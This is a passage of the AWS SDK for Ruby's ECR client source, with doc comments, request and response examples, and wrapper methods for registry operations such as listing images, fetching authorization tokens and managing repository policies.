# resp.image_scan_status.status #=> String, one of "IN_PROGRESS", "COMPLETE", "FAILED"
# resp.image_scan_status.description #=> String
# resp.image_scan_findings.image_scan_completed_at #=> Time
# resp.image_scan_findings.vulnerability_source_updated_at #=> Time
# resp.image_scan_findings.findings #=> Array
# resp.image_scan_findings.findings[0].name #=> String
# resp.image_scan_findings.findings[0].description #=> String
# resp.image_scan_findings.findings[0].uri #=> String
# resp.image_scan_findings.findings[0].severity #=> String, one of "INFORMATIONAL", "LOW", "MEDIUM", "HIGH", "CRITICAL", "UNDEFINED"
# resp.image_scan_findings.findings[0].attributes #=> Array
# resp.image_scan_findings.findings[0].attributes[0].key #=> String
# resp.image_scan_findings.findings[0].attributes[0].value #=> <Hash,Array,String,Numeric,Boolean,IO,Set,nil>
# resp.image_scan_findings.finding_severity_counts #=> Hash
# resp.image_scan_findings.finding_severity_counts["FindingSeverity"] #=> Integer
# resp.next_token #=> String
#
#
# The following waiters are defined for this operation (see {Client#wait_until} for detailed usage):
#
# * image_scan_complete
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeImageScanFindings AWS API Documentation
#
# @overload describe_image_scan_findings(params = {})
# @param [Hash] params ({})
def describe_image_scan_findings(params = {}, options = {})
req = build_request(:describe_image_scan_findings, params)
req.send_request(options)
end
# Returns metadata about the images in a repository.
#
# <note markdown="1"> Beginning with Docker version 1.9, the Docker client compresses image
# layers before pushing them to a V2 Docker registry. The output of the
# `docker images` command shows the uncompressed image size, so it may
# return a larger image size than the image sizes returned by
# DescribeImages.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to describe images. If you do not specify a
# registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The repository that contains the images to describe.
#
# @option params [Array<Types::ImageIdentifier>] :image_ids
# The list of image IDs for the requested repository.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `DescribeImages` request where `maxResults` was used and the results
# exceeded the value of that parameter. Pagination continues from the
# end of the previous results that returned the `nextToken` value. This
# value is `null` when there are no more results to return. This option
# cannot be used when you specify images with `imageIds`.
#
# @option params [Integer] :max_results
# The maximum number of repository results returned by `DescribeImages`
# in paginated output. When this parameter is used, `DescribeImages`
# only returns `maxResults` results in a single page along with a
# `nextToken` response element. The remaining results of the initial
# request can be seen by sending another `DescribeImages` request with
# the returned `nextToken` value. This value can be between 1 and 1000.
# If this parameter is not used, then `DescribeImages` returns up to 100
# results and a `nextToken` value, if applicable. This option cannot be
# used when you specify images with `imageIds`.
#
# @option params [Types::DescribeImagesFilter] :filter
# The filter key and value with which to filter your `DescribeImages`
# results.
#
# @return [Types::DescribeImagesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeImagesResponse#image_details #image_details} => Array<Types::ImageDetail>
# * {Types::DescribeImagesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.describe_images({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# next_token: "NextToken",
# max_results: 1,
# filter: {
# tag_status: "TAGGED", # accepts TAGGED, UNTAGGED, ANY
# },
# })
#
# @example Response structure
#
# resp.image_details #=> Array
# resp.image_details[0].registry_id #=> String
# resp.image_details[0].repository_name #=> String
# resp.image_details[0].image_digest #=> String
# resp.image_details[0].image_tags #=> Array
# resp.image_details[0].image_tags[0] #=> String
# resp.image_details[0].image_size_in_bytes #=> Integer
# resp.image_details[0].image_pushed_at #=> Time
# resp.image_details[0].image_scan_status.status #=> String, one of "IN_PROGRESS", "COMPLETE", "FAILED"
# resp.image_details[0].image_scan_status.description #=> String
# resp.image_details[0].image_scan_findings_summary.image_scan_completed_at #=> Time
# resp.image_details[0].image_scan_findings_summary.vulnerability_source_updated_at #=> Time
# resp.image_details[0].image_scan_findings_summary.finding_severity_counts #=> Hash
# resp.image_details[0].image_scan_findings_summary.finding_severity_counts["FindingSeverity"] #=> Integer
# resp.image_details[0].image_manifest_media_type #=> String
# resp.image_details[0].artifact_media_type #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeImages AWS API Documentation
#
# @overload describe_images(params = {})
# @param [Hash] params ({})
def describe_images(params = {}, options = {})
req = build_request(:describe_images, params)
req.send_request(options)
end
# Describes the settings for a registry. The replication configuration
# for a repository can be created or updated with the
# PutReplicationConfiguration API action.
#
# @return [Types::DescribeRegistryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeRegistryResponse#registry_id #registry_id} => String
# * {Types::DescribeRegistryResponse#replication_configuration #replication_configuration} => Types::ReplicationConfiguration
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.replication_configuration.rules #=> Array
# resp.replication_configuration.rules[0].destinations #=> Array
# resp.replication_configuration.rules[0].destinations[0].region #=> String
# resp.replication_configuration.rules[0].destinations[0].registry_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeRegistry AWS API Documentation
#
# @overload describe_registry(params = {})
# @param [Hash] params ({})
def describe_registry(params = {}, options = {})
req = build_request(:describe_registry, params)
req.send_request(options)
end
# Describes image repositories in a registry.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repositories to be described. If you do not specify a registry, the
# default registry is assumed.
#
# @option params [Array<String>] :repository_names
# A list of repositories to describe. If this parameter is omitted, then
# all repositories in a registry are described.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `DescribeRepositories` request where `maxResults` was used and the
# results exceeded the value of that parameter. Pagination continues
# from the end of the previous results that returned the `nextToken`
# value. This value is `null` when there are no more results to return.
# This option cannot be used when you specify repositories with
# `repositoryNames`.
#
# <note markdown="1"> This token should be treated as an opaque identifier that is only used
# to retrieve the next items in a list and not for other programmatic
# purposes.
#
# </note>
#
# @option params [Integer] :max_results
# The maximum number of repository results returned by
# `DescribeRepositories` in paginated output. When this parameter is
# used, `DescribeRepositories` only returns `maxResults` results in a
# single page along with a `nextToken` response element. The remaining
# results of the initial request can be seen by sending another
# `DescribeRepositories` request with the returned `nextToken` value.
# This value can be between 1 and 1000. If this parameter is not used,
# then `DescribeRepositories` returns up to 100 results and a
# `nextToken` value, if applicable. This option cannot be used when you
# specify repositories with `repositoryNames`.
#
# @return [Types::DescribeRepositoriesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeRepositoriesResponse#repositories #repositories} => Array<Types::Repository>
# * {Types::DescribeRepositoriesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
#
# @example Example: To describe all repositories in the current account
#
# # The following example obtains a list and description of all repositories in the default registry to which the current
# # user has access.
#
# resp = client.describe_repositories({
# })
#
# resp.to_h outputs the following:
# {
# repositories: [
# {
# registry_id: "012345678910",
# repository_arn: "arn:aws:ecr:us-west-2:012345678910:repository/ubuntu",
# repository_name: "ubuntu",
# },
# {
# registry_id: "012345678910",
# repository_arn: "arn:aws:ecr:us-west-2:012345678910:repository/test",
# repository_name: "test",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_repositories({
# registry_id: "RegistryId",
# repository_names: ["RepositoryName"],
# next_token: "NextToken",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.repositories #=> Array
# resp.repositories[0].repository_arn #=> String
# resp.repositories[0].registry_id #=> String
# resp.repositories[0].repository_name #=> String
# resp.repositories[0].repository_uri #=> String
# resp.repositories[0].created_at #=> Time
# resp.repositories[0].image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
# resp.repositories[0].image_scanning_configuration.scan_on_push #=> Boolean
# resp.repositories[0].encryption_configuration.encryption_type #=> String, one of "AES256", "KMS"
# resp.repositories[0].encryption_configuration.kms_key #=> String
# resp.next_token #=> String
#
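# @example Enumerating pages of repositories (illustrative sketch)
#
#   # A minimal sketch, not part of the generated examples, showing how the
#   # pageable response can be enumerated page by page. The printed fields are
#   # whatever repositories exist in the registry.
#
#   client.describe_repositories.each do |page|
#     page.repositories.each do |repo|
#       puts "#{repo.repository_name} => #{repo.repository_uri}"
#     end
#   end
#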
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeRepositories AWS API Documentation
#
# @overload describe_repositories(params = {})
# @param [Hash] params ({})
def describe_repositories(params = {}, options = {})
req = build_request(:describe_repositories, params)
req.send_request(options)
end
# Retrieves an authorization token. An authorization token represents
# your IAM authentication credentials and can be used to access any
# Amazon ECR registry that your IAM principal has access to. The
# authorization token is valid for 12 hours.
#
# The `authorizationToken` returned is a base64 encoded string that can
# be decoded and used in a `docker login` command to authenticate to a
# registry. The AWS CLI offers a `get-login-password` command that
# simplifies the login process. For more information, see [Registry
# Authentication][1] in the *Amazon Elastic Container Registry User
# Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/Registries.html#registry_auth
#
# @option params [Array<String>] :registry_ids
# A list of AWS account IDs that are associated with the registries for
# which to get AuthorizationData objects. If you do not specify a
# registry, the default registry is assumed.
#
# @return [Types::GetAuthorizationTokenResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetAuthorizationTokenResponse#authorization_data #authorization_data} => Array<Types::AuthorizationData>
#
#
# @example Example: To obtain an authorization token
#
# # This example gets an authorization token for your default registry.
#
# resp = client.get_authorization_token({
# })
#
# resp.to_h outputs the following:
# {
# authorization_data: [
# {
# authorization_token: "QVdTOkN...",
# expires_at: Time.parse("1470951892432"),
# proxy_endpoint: "https://012345678901.dkr.ecr.us-west-2.amazonaws.com",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.get_authorization_token({
# registry_ids: ["RegistryId"],
# })
#
# @example Response structure
#
# resp.authorization_data #=> Array
# resp.authorization_data[0].authorization_token #=> String
# resp.authorization_data[0].expires_at #=> Time
# resp.authorization_data[0].proxy_endpoint #=> String
#
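# @example Decoding the token for `docker login` (illustrative sketch)
#
#   # A minimal sketch, not part of the generated examples, showing how the
#   # base64-encoded token can be split into the user name and password expected
#   # by `docker login`. The decoded user name is normally "AWS".
#
#   require 'base64'
#
#   data = client.get_authorization_token.authorization_data[0]
#   user, password = Base64.decode64(data.authorization_token).split(':', 2)
#   registry = data.proxy_endpoint
#
#   # user, password, and registry can now be passed to `docker login`.
#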
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetAuthorizationToken AWS API Documentation
#
# @overload get_authorization_token(params = {})
# @param [Hash] params ({})
def get_authorization_token(params = {}, options = {})
req = build_request(:get_authorization_token, params)
req.send_request(options)
end
# Retrieves the pre-signed Amazon S3 download URL corresponding to an
# image layer. You can only get URLs for image layers that are
# referenced in an image.
#
# When an image is pulled, the GetDownloadUrlForLayer API is called once
# per image layer that is not already cached.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# image layer to download. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that is associated with the image layer to
# download.
#
# @option params [required, String] :layer_digest
# The digest of the image layer to download.
#
# @return [Types::GetDownloadUrlForLayerResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetDownloadUrlForLayerResponse#download_url #download_url} => String
# * {Types::GetDownloadUrlForLayerResponse#layer_digest #layer_digest} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_download_url_for_layer({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# layer_digest: "LayerDigest", # required
# })
#
# @example Response structure
#
# resp.download_url #=> String
# resp.layer_digest #=> String
#
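# @example Fetching a layer through the pre-signed URL (illustrative sketch)
#
#   # A minimal sketch, not part of the generated examples, showing how the
#   # returned download URL could be fetched with Ruby's standard library. The
#   # repository name and layer digest below are placeholders.
#
#   require 'net/http'
#   require 'uri'
#
#   resp = client.get_download_url_for_layer({
#     repository_name: "my-repo",                    # assumed repository name
#     layer_digest: "sha256:EXAMPLEDIGEST",          # placeholder digest
#   })
#
#   layer_blob = Net::HTTP.get(URI(resp.download_url))
#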
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetDownloadUrlForLayer AWS API Documentation
#
# @overload get_download_url_for_layer(params = {})
# @param [Hash] params ({})
def get_download_url_for_layer(params = {}, options = {})
req = build_request(:get_download_url_for_layer, params)
req.send_request(options)
end
# Retrieves the lifecycle policy for the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository.
#
# @return [Types::GetLifecyclePolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetLifecyclePolicyResponse#registry_id #registry_id} => String
# * {Types::GetLifecyclePolicyResponse#repository_name #repository_name} => String
# * {Types::GetLifecyclePolicyResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::GetLifecyclePolicyResponse#last_evaluated_at #last_evaluated_at} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.get_lifecycle_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.last_evaluated_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetLifecyclePolicy AWS API Documentation
#
# @overload get_lifecycle_policy(params = {})
# @param [Hash] params ({})
def get_lifecycle_policy(params = {}, options = {})
req = build_request(:get_lifecycle_policy, params)
req.send_request(options)
end
# Retrieves the results of the lifecycle policy preview request for the
# specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository.
#
# @option params [Array<Types::ImageIdentifier>] :image_ids
#   The list of image IDs to be included.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `GetLifecyclePolicyPreviewRequest` request where `maxResults` was used
#   and the results exceeded the value of that parameter. Pagination
#   continues from the end of the previous results that returned the
#   `nextToken` value. This value is `null` when there are no more
# results to return. This option cannot be used when you specify images
# with `imageIds`.
#
# @option params [Integer] :max_results
# The maximum number of repository results returned by
#   `GetLifecyclePolicyPreviewRequest` in paginated output. When this
#   parameter is used, `GetLifecyclePolicyPreviewRequest` only returns
#   `maxResults` results in a single page along with a `nextToken`
#   response element. The remaining results of the initial request can be
#   seen by sending another `GetLifecyclePolicyPreviewRequest` request
#   with the returned `nextToken` value. This value can be between 1 and
#   1000. If this parameter is not used, then
#   `GetLifecyclePolicyPreviewRequest` returns up to 100 results and a
#   `nextToken` value, if applicable. This option cannot be used when you
# specify images with `imageIds`.
#
# @option params [Types::LifecyclePolicyPreviewFilter] :filter
# An optional parameter that filters results based on image tag status
# and all tags, if tagged.
#
# @return [Types::GetLifecyclePolicyPreviewResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetLifecyclePolicyPreviewResponse#registry_id #registry_id} => String
# * {Types::GetLifecyclePolicyPreviewResponse#repository_name #repository_name} => String
# * {Types::GetLifecyclePolicyPreviewResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::GetLifecyclePolicyPreviewResponse#status #status} => String
# * {Types::GetLifecyclePolicyPreviewResponse#next_token #next_token} => String
# * {Types::GetLifecyclePolicyPreviewResponse#preview_results #preview_results} => Array<Types::LifecyclePolicyPreviewResult>
# * {Types::GetLifecyclePolicyPreviewResponse#summary #summary} => Types::LifecyclePolicyPreviewSummary
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.get_lifecycle_policy_preview({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# next_token: "NextToken",
# max_results: 1,
# filter: {
# tag_status: "TAGGED", # accepts TAGGED, UNTAGGED, ANY
# },
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.status #=> String, one of "IN_PROGRESS", "COMPLETE", "EXPIRED", "FAILED"
# resp.next_token #=> String
# resp.preview_results #=> Array
# resp.preview_results[0].image_tags #=> Array
# resp.preview_results[0].image_tags[0] #=> String
# resp.preview_results[0].image_digest #=> String
# resp.preview_results[0].image_pushed_at #=> Time
# resp.preview_results[0].action.type #=> String, one of "EXPIRE"
# resp.preview_results[0].applied_rule_priority #=> Integer
# resp.summary.expiring_image_total_count #=> Integer
#
#
# The following waiters are defined for this operation (see {Client#wait_until} for detailed usage):
#
# * lifecycle_policy_preview_complete
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetLifecyclePolicyPreview AWS API Documentation
#
# @overload get_lifecycle_policy_preview(params = {})
# @param [Hash] params ({})
def get_lifecycle_policy_preview(params = {}, options = {})
req = build_request(:get_lifecycle_policy_preview, params)
req.send_request(options)
end
# Retrieves the permissions policy for a registry.
#
# @return [Types::GetRegistryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetRegistryPolicyResponse#registry_id #registry_id} => String
# * {Types::GetRegistryPolicyResponse#policy_text #policy_text} => String
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetRegistryPolicy AWS API Documentation
#
# @overload get_registry_policy(params = {})
# @param [Hash] params ({})
def get_registry_policy(params = {}, options = {})
req = build_request(:get_registry_policy, params)
req.send_request(options)
end
# Retrieves the repository policy for the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository with the policy to retrieve.
#
# @return [Types::GetRepositoryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetRepositoryPolicyResponse#registry_id #registry_id} => String
# * {Types::GetRepositoryPolicyResponse#repository_name #repository_name} => String
# * {Types::GetRepositoryPolicyResponse#policy_text #policy_text} => String
#
#
# @example Example: To get the current policy for a repository
#
# # This example obtains the repository policy for the repository named ubuntu.
#
# resp = client.get_repository_policy({
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# policy_text: "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"new statement\",\n \"Effect\" : \"Allow\",\n \"Principal\" : {\n \"AWS\" : \"arn:aws:iam::012345678901:role/CodeDeployDemo\"\n },\n\"Action\" : [ \"ecr:GetDownloadUrlForLayer\", \"ecr:BatchGetImage\", \"ecr:BatchCheckLayerAvailability\" ]\n } ]\n}",
# registry_id: "012345678901",
# repository_name: "ubuntu",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.get_repository_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetRepositoryPolicy AWS API Documentation
#
# @overload get_repository_policy(params = {})
# @param [Hash] params ({})
def get_repository_policy(params = {}, options = {})
req = build_request(:get_repository_policy, params)
req.send_request(options)
end
# Notifies Amazon ECR that you intend to upload an image layer.
#
# When an image is pushed, the InitiateLayerUpload API is called once
# per image layer that has not already been uploaded. Whether or not an
# image layer has been uploaded is determined by the
# BatchCheckLayerAvailability API action.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry to which you intend to
# upload layers. If you do not specify a registry, the default registry
# is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to which you intend to upload layers.
#
# @return [Types::InitiateLayerUploadResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::InitiateLayerUploadResponse#upload_id #upload_id} => String
# * {Types::InitiateLayerUploadResponse#part_size #part_size} => Integer
#
# @example Request syntax with placeholder values
#
# resp = client.initiate_layer_upload({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.upload_id #=> String
# resp.part_size #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/InitiateLayerUpload AWS API Documentation
#
# @overload initiate_layer_upload(params = {})
# @param [Hash] params ({})
def initiate_layer_upload(params = {}, options = {})
req = build_request(:initiate_layer_upload, params)
req.send_request(options)
end
# Lists all the image IDs for the specified repository.
#
# You can filter images based on whether or not they are tagged by using
# the `tagStatus` filter and specifying either `TAGGED`, `UNTAGGED` or
# `ANY`. For example, you can filter your results to return only
# `UNTAGGED` images and then pipe that result to a BatchDeleteImage
# operation to delete them. Or, you can filter your results to return
# only `TAGGED` images to list all of the tags in your repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to list images. If you do not specify a registry,
# the default registry is assumed.
#
# @option params [required, String] :repository_name
# The repository with image IDs to be listed.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated `ListImages`
# request where `maxResults` was used and the results exceeded the value
# of that parameter. Pagination continues from the end of the previous
# results that returned the `nextToken` value. This value is `null` when
# there are no more results to return.
#
# <note markdown="1"> This token should be treated as an opaque identifier that is only used
# to retrieve the next items in a list and not for other programmatic
# purposes.
#
# </note>
#
# @option params [Integer] :max_results
# The maximum number of image results returned by `ListImages` in
# paginated output. When this parameter is used, `ListImages` only
# returns `maxResults` results in a single page along with a `nextToken`
# response element. The remaining results of the initial request can be
# seen by sending another `ListImages` request with the returned
# `nextToken` value. This value can be between 1 and 1000. If this
# parameter is not used, then `ListImages` returns up to 100 results and
# a `nextToken` value, if applicable.
#
# @option params [Types::ListImagesFilter] :filter
# The filter key and value with which to filter your `ListImages`
# results.
#
# @return [Types::ListImagesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListImagesResponse#image_ids #image_ids} => Array<Types::ImageIdentifier>
# * {Types::ListImagesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
#
# @example Example: To list all images in a repository
#
# # This example lists all of the images in the repository named ubuntu in the default registry in the current account.
#
# resp = client.list_images({
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# image_ids: [
# {
# image_digest: "sha256:764f63476bdff6d83a09ba2a818f0d35757063724a9ac3ba5019c56f74ebf42a",
# image_tag: "precise",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.list_images({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# next_token: "NextToken",
# max_results: 1,
# filter: {
# tag_status: "TAGGED", # accepts TAGGED, UNTAGGED, ANY
# },
# })
#
# @example Response structure
#
# resp.image_ids #=> Array
# resp.image_ids[0].image_digest #=> String
# resp.image_ids[0].image_tag #=> String
# resp.next_token #=> String
#
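# @example Deleting untagged images (illustrative sketch)
#
#   # A minimal sketch, not part of the generated examples, of the untagged-image
#   # cleanup flow described above: list UNTAGGED image IDs, then pass them to
#   # BatchDeleteImage. The repository name is assumed and only the first page of
#   # results is handled here.
#
#   untagged = client.list_images({
#     repository_name: "my-repo",            # assumed repository name
#     filter: { tag_status: "UNTAGGED" },
#   }).image_ids
#
#   unless untagged.empty?
#     client.batch_delete_image({
#       repository_name: "my-repo",
#       image_ids: untagged.map { |id| { image_digest: id.image_digest } },
#     })
#   end
#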
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/ListImages AWS API Documentation
#
# @overload list_images(params = {})
# @param [Hash] params ({})
def list_images(params = {}, options = {})
req = build_request(:list_images, params)
req.send_request(options)
end
# Lists the tags for an Amazon ECR resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) that identifies the resource for which
# to list the tags. Currently, the only supported resource is an Amazon
# ECR repository.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Array<Types::Tag>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "Arn", # required
# })
#
# @example Response structure
#
# resp.tags #=> Array
# resp.tags[0].key #=> String
# resp.tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Creates or updates the image manifest and tags associated with an
# image.
#
# When an image is pushed and all new image layers have been uploaded,
# the PutImage API is called once to create or update the image manifest
# and the tags associated with the image.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to put the image. If you do not specify a
# registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository in which to put the image.
#
# @option params [required, String] :image_manifest
# The image manifest corresponding to the image to be uploaded.
#
# @option params [String] :image_manifest_media_type
# The media type of the image manifest. If you push an image manifest
# that does not contain the `mediaType` field, you must specify the
# `imageManifestMediaType` in the request.
#
# @option params [String] :image_tag
# The tag to associate with the image. This parameter is required for
# images that use the Docker Image Manifest V2 Schema 2 or Open
# Container Initiative (OCI) formats.
#
# @option params [String] :image_digest
# The image digest of the image manifest corresponding to the image.
#
# @return [Types::PutImageResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutImageResponse#image #image} => Types::Image
#
# @example Request syntax with placeholder values
#
# resp = client.put_image({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_manifest: "ImageManifest", # required
# image_manifest_media_type: "MediaType",
# image_tag: "ImageTag",
# image_digest: "ImageDigest",
# })
#
# @example Response structure
#
# resp.image.registry_id #=> String
# resp.image.repository_name #=> String
# resp.image.image_id.image_digest #=> String
# resp.image.image_id.image_tag #=> String
# resp.image.image_manifest #=> String
# resp.image.image_manifest_media_type #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutImage AWS API Documentation
#
# @overload put_image(params = {})
# @param [Hash] params ({})
def put_image(params = {}, options = {})
req = build_request(:put_image, params)
req.send_request(options)
end
# Updates the image scanning configuration for the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to update the image scanning configuration
# setting. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository in which to update the image scanning
# configuration setting.
#
# @option params [required, Types::ImageScanningConfiguration] :image_scanning_configuration
# The image scanning configuration for the repository. This setting
# determines whether images are scanned for known vulnerabilities after
# being pushed to the repository.
#
# @return [Types::PutImageScanningConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutImageScanningConfigurationResponse#registry_id #registry_id} => String
# * {Types::PutImageScanningConfigurationResponse#repository_name #repository_name} => String
# * {Types::PutImageScanningConfigurationResponse#image_scanning_configuration #image_scanning_configuration} => Types::ImageScanningConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.put_image_scanning_configuration({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_scanning_configuration: { # required
# scan_on_push: false,
# },
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_scanning_configuration.scan_on_push #=> Boolean
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutImageScanningConfiguration AWS API Documentation
#
# @overload put_image_scanning_configuration(params = {})
# @param [Hash] params ({})
def put_image_scanning_configuration(params = {}, options = {})
req = build_request(:put_image_scanning_configuration, params)
req.send_request(options)
end
# Updates the image tag mutability settings for the specified
# repository. For more information, see [Image Tag Mutability][1] in the
# *Amazon Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-tag-mutability.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to update the image tag mutability settings. If
# you do not specify a registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository in which to update the image tag mutability
# settings.
#
# @option params [required, String] :image_tag_mutability
# The tag mutability setting for the repository. If `MUTABLE` is
# specified, image tags can be overwritten. If `IMMUTABLE` is specified,
#   all image tags within the repository will be immutable, which will
# prevent them from being overwritten.
#
# @return [Types::PutImageTagMutabilityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutImageTagMutabilityResponse#registry_id #registry_id} => String
# * {Types::PutImageTagMutabilityResponse#repository_name #repository_name} => String
# * {Types::PutImageTagMutabilityResponse#image_tag_mutability #image_tag_mutability} => String
#
# @example Request syntax with placeholder values
#
# resp = client.put_image_tag_mutability({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
